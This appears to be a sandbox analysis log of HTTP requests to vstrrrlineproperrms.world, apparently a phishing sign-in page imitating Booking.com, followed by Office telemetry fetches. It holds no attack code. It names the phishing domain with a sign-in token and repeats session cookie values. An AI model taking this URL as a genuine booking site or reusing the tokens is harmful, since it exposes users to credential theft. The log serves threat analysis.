cf_clearance=ImTEX.W8TkinWI1ot9M0e2YukqaAe5R1vtOsQzPaCHM-1748445018-1.2.1.1-JQCCFZgfgo04ZTq3X0l2JPW1uJM0CHcLyuF35DH6.JHw4wFfDgFHoKooNse_l0eFQhr5Fsqedn7phkW7NGUqnZzf5nKDO9DknQL2LfogCS5xN5CTDo6BoZcxQRASW6qrChnycsM2evF5rOXD3GdrIu5urfl36XlUngWQ_TGXv3c9FsSzhLPWRgfXvE1p26YNm_s57ub0hIMEw4o7bfkfZQ0hDVlDffNBbl8YmTO.SQy4Aa0Geg4g6SE17ZgDjU9aFpG8yInCHrmV3NPChG8yc33AjCk5bXEGkN_KhFMzKYt2yLoKsr5HVJdGz2a3OklmwJtoPuMMi.jm
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://vstrrrlineproperrms.world/sign-in?op_token=TfJdHmLBtgyxynNyAVQfoJA5CI6hyqzkoKUihdfmGSMECOhmRPG7L5ISpinTV2lUg6pqPRSZOtIubLLBVAYQb47bO6BoYssoHdiMBVPi0JRThIGTbjdor5Dq5V0IaJC3XFZn2VYlhEyhQeqDnssydNaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: cf_clearance=ImTEX.W8TkinWI1ot9M0e2YukqaAe5R1vtOsQzPaCHM-1748445018-1.2.1.1-JQCCFZgfgo04ZTq3X0l2JPW1uJM0CHcLyuF35DH6.JHw4wFfDgFHoKooNse_l0eFQhr5Fsqedn7phkW7NGUqnZzf5nKDO9DknQL2LfogCS5xN5CTDo6BoZcxQRASW6qrChnycsM2evF5rOXD3GdrIu5urfl36XlUngWQ_TGXv3c9FsSzhLPWRgfXvE1p26YNm_s57ub0hIMEw4o7bfkfZQ0hDVlDffNBbl8YmTO.SQy4Aa0Geg4g6SE17ZgDjU9aFpG8yInCHrmV3NPChG8yc33AjCk5bXEGkN_KhFMzKYt2yLoKsr5HVJdGz2a3OklmwJtoPuMMi.jmkIir2MDzKL.zcI_KyNW4cXf6Nu0mo
              Source: global trafficHTTP traffic detected: GET /Reservation_files/319302651.jpg HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://vstrrrlineproperrms.world/sign-in?op_token=TfJdHmLBtgyxynNyAVQfoJA5CI6hyqzkoKUihdfmGSMECOhmRPG7L5ISpinTV2lUg6pqPRSZOtIubLLBVAYQb47bO6BoYssoHdiMBVPi0JRThIGTbjdor5Dq5V0IaJC3XFZn2VYlhEyhQeqDnssydNaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: cf_clearance=ImTEX.W8TkinWI1ot9M0e2YukqaAe5R1vtOsQzPaCHM-1748445018-1.2.1.1-JQCCFZgfgo04ZTq3X0l2JPW1uJM0CHcLyuF35DH6.JHw4wFfDgFHoKooNse_l0eFQhr5Fsqedn7phkW7NGUqnZzf5nKDO9DknQL2LfogCS5xN5CTDo6BoZcxQRASW6qrChnycsM2evF5rOXD3GdrIu5urfl36XlUngWQ_TGXv3c9FsSzhLPWRgfXvE1p26YNm_s57ub0hIMEw4o7bfkfZQ0hDVlDffNBbl8YmTO.SQy4Aa0Geg4g6SE17ZgDjU9aFpG8yInCHrmV3NPChG8yc33AjCk5bXEGkN_KhFMzKYt2yLoKsr5HVJdGz2a3OklmwJtoPuMMi.jm
              Source: global trafficHTTP traffic detected: GET /Reservation_files/166939781.jpg HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://vstrrrlineproperrms.world/sign-in?op_token=TfJdHmLBtgyxynNyAVQfoJA5CI6hyqzkoKUihdfmGSMECOhmRPG7L5ISpinTV2lUg6pqPRSZOtIubLLBVAYQb47bO6BoYssoHdiMBVPi0JRThIGTbjdor5Dq5V0IaJC3XFZn2VYlhEyhQeqDnssydNaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: cf_clearance=ImTEX.W8TkinWI1ot9M0e2YukqaAe5R1vtOsQzPaCHM-1748445018-1.2.1.1-JQCCFZgfgo04ZTq3X0l2JPW1uJM0CHcLyuF35DH6.JHw4wFfDgFHoKooNse_l0eFQhr5Fsqedn7phkW7NGUqnZzf5nKDO9DknQL2LfogCS5xN5CTDo6BoZcxQRASW6qrChnycsM2evF5rOXD3GdrIu5urfl36XlUngWQ_TGXv3c9FsSzhLPWRgfXvE1p26YNm_s57ub0hIMEw4o7bfkfZQ0hDVlDffNBbl8YmTO.SQy4Aa0Geg4g6SE17ZgDjU9aFpG8yInCHrmV3NPChG8yc33AjCk5bXEGkN_KhFMzKYt2yLoKsr5HVJdGz2a3OklmwJtoPuMMi.jm
              Source: global trafficHTTP traffic detected: GET /Reservation_files/438648711.jpg HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://vstrrrlineproperrms.world/sign-in?op_token=TfJdHmLBtgyxynNyAVQfoJA5CI6hyqzkoKUihdfmGSMECOhmRPG7L5ISpinTV2lUg6pqPRSZOtIubLLBVAYQb47bO6BoYssoHdiMBVPi0JRThIGTbjdor5Dq5V0IaJC3XFZn2VYlhEyhQeqDnssydNaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: cf_clearance=ImTEX.W8TkinWI1ot9M0e2YukqaAe5R1vtOsQzPaCHM-1748445018-1.2.1.1-JQCCFZgfgo04ZTq3X0l2JPW1uJM0CHcLyuF35DH6.JHw4wFfDgFHoKooNse_l0eFQhr5Fsqedn7phkW7NGUqnZzf5nKDO9DknQL2LfogCS5xN5CTDo6BoZcxQRASW6qrChnycsM2evF5rOXD3GdrIu5urfl36XlUngWQ_TGXv3c9FsSzhLPWRgfXvE1p26YNm_s57ub0hIMEw4o7bfkfZQ0hDVlDffNBbl8YmTO.SQy4Aa0Geg4g6SE17ZgDjU9aFpG8yInCHrmV3NPChG8yc33AjCk5bXEGkN_KhFMzKYt2yLoKsr5HVJdGz2a3OklmwJtoPuMMi.jm
              Source: global trafficHTTP traffic detected: GET /Reservation_files/625bf8aec1510ce62b414074752052f184a60801.svg HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://vstrrrlineproperrms.world/sign-in?op_token=TfJdHmLBtgyxynNyAVQfoJA5CI6hyqzkoKUihdfmGSMECOhmRPG7L5ISpinTV2lUg6pqPRSZOtIubLLBVAYQb47bO6BoYssoHdiMBVPi0JRThIGTbjdor5Dq5V0IaJC3XFZn2VYlhEyhQeqDnssydNaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: cf_clearance=ImTEX.W8TkinWI1ot9M0e2YukqaAe5R1vtOsQzPaCHM-1748445018-1.2.1.1-JQCCFZgfgo04ZTq3X0l2JPW1uJM0CHcLyuF35DH6.JHw4wFfDgFHoKooNse_l0eFQhr5Fsqedn7phkW7NGUqnZzf5nKDO9DknQL2LfogCS5xN5CTDo6BoZcxQRASW6qrChnycsM2evF5rOXD3GdrIu5urfl36XlUngWQ_TGXv3c9FsSzhLPWRgfXvE1p26YNm_s57ub0hIMEw4o7bfkfZQ0hDVlDffNBbl8YmTO.SQy4Aa0Geg4g6SE17ZgDjU9aFpG8yInCHrmV3NPChG8yc33AjCk5bXEGkN_KhFMzKYt2y
              Source: global trafficHTTP traffic detected: GET /Reservation_files/no.png HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://vstrrrlineproperrms.world/sign-in?op_token=TfJdHmLBtgyxynNyAVQfoJA5CI6hyqzkoKUihdfmGSMECOhmRPG7L5ISpinTV2lUg6pqPRSZOtIubLLBVAYQb47bO6BoYssoHdiMBVPi0JRThIGTbjdor5Dq5V0IaJC3XFZn2VYlhEyhQeqDnssydNaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: cf_clearance=ImTEX.W8TkinWI1ot9M0e2YukqaAe5R1vtOsQzPaCHM-1748445018-1.2.1.1-JQCCFZgfgo04ZTq3X0l2JPW1uJM0CHcLyuF35DH6.JHw4wFfDgFHoKooNse_l0eFQhr5Fsqedn7phkW7NGUqnZzf5nKDO9DknQL2LfogCS5xN5CTDo6BoZcxQRASW6qrChnycsM2evF5rOXD3GdrIu5urfl36XlUngWQ_TGXv3c9FsSzhLPWRgfXvE1p26YNm_s57ub0hIMEw4o7bfkfZQ0hDVlDffNBbl8YmTO.SQy4Aa0Geg4g6SE17ZgDjU9aFpG8yInCHrmV3NPChG8yc33AjCk5bXEGkN_KhFMzKYt2yLoKsr5HVJdGz2a3OklmwJtoPuMMi.jmkIir2MD
              Source: global trafficHTTP traffic detected: GET /Reservation_files/protect.svg HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://vstrrrlineproperrms.world/sign-in?op_token=TfJdHmLBtgyxynNyAVQfoJA5CI6hyqzkoKUihdfmGSMECOhmRPG7L5ISpinTV2lUg6pqPRSZOtIubLLBVAYQb47bO6BoYssoHdiMBVPi0JRThIGTbjdor5Dq5V0IaJC3XFZn2VYlhEyhQeqDnssydNaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: cf_clearance=ImTEX.W8TkinWI1ot9M0e2YukqaAe5R1vtOsQzPaCHM-1748445018-1.2.1.1-JQCCFZgfgo04ZTq3X0l2JPW1uJM0CHcLyuF35DH6.JHw4wFfDgFHoKooNse_l0eFQhr5Fsqedn7phkW7NGUqnZzf5nKDO9DknQL2LfogCS5xN5CTDo6BoZcxQRASW6qrChnycsM2evF5rOXD3GdrIu5urfl36XlUngWQ_TGXv3c9FsSzhLPWRgfXvE1p26YNm_s57ub0hIMEw4o7bfkfZQ0hDVlDffNBbl8YmTO.SQy4Aa0Geg4g6SE17ZgDjU9aFpG8yInCHrmV3NPChG8yc33AjCk5bXEGkN_KhFMzKYt2yLoKsr5HVJdGz2a3OklmwJtoPuMMi.jmkI
              Source: global trafficHTTP traffic detected: GET /Reservation_files/319302672.jpg HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://vstrrrlineproperrms.world/sign-in?op_token=TfJdHmLBtgyxynNyAVQfoJA5CI6hyqzkoKUihdfmGSMECOhmRPG7L5ISpinTV2lUg6pqPRSZOtIubLLBVAYQb47bO6BoYssoHdiMBVPi0JRThIGTbjdor5Dq5V0IaJC3XFZn2VYlhEyhQeqDnssydNaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: cf_clearance=ImTEX.W8TkinWI1ot9M0e2YukqaAe5R1vtOsQzPaCHM-1748445018-1.2.1.1-JQCCFZgfgo04ZTq3X0l2JPW1uJM0CHcLyuF35DH6.JHw4wFfDgFHoKooNse_l0eFQhr5Fsqedn7phkW7NGUqnZzf5nKDO9DknQL2LfogCS5xN5CTDo6BoZcxQRASW6qrChnycsM2evF5rOXD3GdrIu5urfl36XlUngWQ_TGXv3c9FsSzhLPWRgfXvE1p26YNm_s57ub0hIMEw4o7bfkfZQ0hDVlDffNBbl8YmTO.SQy4Aa0Geg4g6SE17ZgDjU9aFpG8yInCHrmV3NPChG8yc33AjCk5bXEGkN_KhFMzKYt2yLoKsr5HVJdGz2a3OklmwJtoPuMMi.jm
              Source: global trafficHTTP traffic detected: GET /Reservation_files/333642474.jpg HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://vstrrrlineproperrms.world/sign-in?op_token=TfJdHmLBtgyxynNyAVQfoJA5CI6hyqzkoKUihdfmGSMECOhmRPG7L5ISpinTV2lUg6pqPRSZOtIubLLBVAYQb47bO6BoYssoHdiMBVPi0JRThIGTbjdor5Dq5V0IaJC3XFZn2VYlhEyhQeqDnssydNaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: cf_clearance=ImTEX.W8TkinWI1ot9M0e2YukqaAe5R1vtOsQzPaCHM-1748445018-1.2.1.1-JQCCFZgfgo04ZTq3X0l2JPW1uJM0CHcLyuF35DH6.JHw4wFfDgFHoKooNse_l0eFQhr5Fsqedn7phkW7NGUqnZzf5nKDO9DknQL2LfogCS5xN5CTDo6BoZcxQRASW6qrChnycsM2evF5rOXD3GdrIu5urfl36XlUngWQ_TGXv3c9FsSzhLPWRgfXvE1p26YNm_s57ub0hIMEw4o7bfkfZQ0hDVlDffNBbl8YmTO.SQy4Aa0Geg4g6SE17ZgDjU9aFpG8yInCHrmV3NPChG8yc33AjCk5bXEGkN_KhFMzKYt2yLoKsr5HVJdGz2a3OklmwJtoPuMMi.jm
              Source: global trafficHTTP traffic detected: GET /Reservation_files/b_logo_blue.png HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://vstrrrlineproperrms.world/sign-in?op_token=TfJdHmLBtgyxynNyAVQfoJA5CI6hyqzkoKUihdfmGSMECOhmRPG7L5ISpinTV2lUg6pqPRSZOtIubLLBVAYQb47bO6BoYssoHdiMBVPi0JRThIGTbjdor5Dq5V0IaJC3XFZn2VYlhEyhQeqDnssydNaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: cf_clearance=ImTEX.W8TkinWI1ot9M0e2YukqaAe5R1vtOsQzPaCHM-1748445018-1.2.1.1-JQCCFZgfgo04ZTq3X0l2JPW1uJM0CHcLyuF35DH6.JHw4wFfDgFHoKooNse_l0eFQhr5Fsqedn7phkW7NGUqnZzf5nKDO9DknQL2LfogCS5xN5CTDo6BoZcxQRASW6qrChnycsM2evF5rOXD3GdrIu5urfl36XlUngWQ_TGXv3c9FsSzhLPWRgfXvE1p26YNm_s57ub0hIMEw4o7bfkfZQ0hDVlDffNBbl8YmTO.SQy4Aa0Geg4g6SE17ZgDjU9aFpG8yInCHrmV3NPChG8yc33AjCk5bXEGkN_KhFMzKYt2yLoKsr5HVJdGz2a3OklmwJtoPuMMi.
              Source: global trafficHTTP traffic detected: GET /jquery-3.7.1.min.js HTTP/1.1host: code.jquery.comorigin: https://vstrrrlineproperrms.worldsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://vstrrrlineproperrms.world/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
              Source: global trafficHTTP traffic detected: GET /themes/custom/booking/images/favicons/site.webmanifest HTTP/1.1host: partner.booking.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://vstrrrlineproperrms.worldsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: manifestreferer: https://vstrrrlineproperrms.world/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
              Source: global trafficHTTP traffic detected: GET /static/favicon.svg HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://vstrrrlineproperrms.world/sign-in?op_token=TfJdHmLBtgyxynNyAVQfoJA5CI6hyqzkoKUihdfmGSMECOhmRPG7L5ISpinTV2lUg6pqPRSZOtIubLLBVAYQb47bO6BoYssoHdiMBVPi0JRThIGTbjdor5Dq5V0IaJC3XFZn2VYlhEyhQeqDnssydNaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: cf_clearance=ImTEX.W8TkinWI1ot9M0e2YukqaAe5R1vtOsQzPaCHM-1748445018-1.2.1.1-JQCCFZgfgo04ZTq3X0l2JPW1uJM0CHcLyuF35DH6.JHw4wFfDgFHoKooNse_l0eFQhr5Fsqedn7phkW7NGUqnZzf5nKDO9DknQL2LfogCS5xN5CTDo6BoZcxQRASW6qrChnycsM2evF5rOXD3GdrIu5urfl36XlUngWQ_TGXv3c9FsSzhLPWRgfXvE1p26YNm_s57ub0hIMEw4o7bfkfZQ0hDVlDffNBbl8YmTO.SQy4Aa0Geg4g6SE17ZgDjU9aFpG8yInCHrmV3NPChG8yc33AjCk5bXEGkN_KhFMzKYt2yLoKsr5HVJdGz2a3OklmwJtoPuMMi.jmkIir2MDzKL.zc
              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120600v5s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
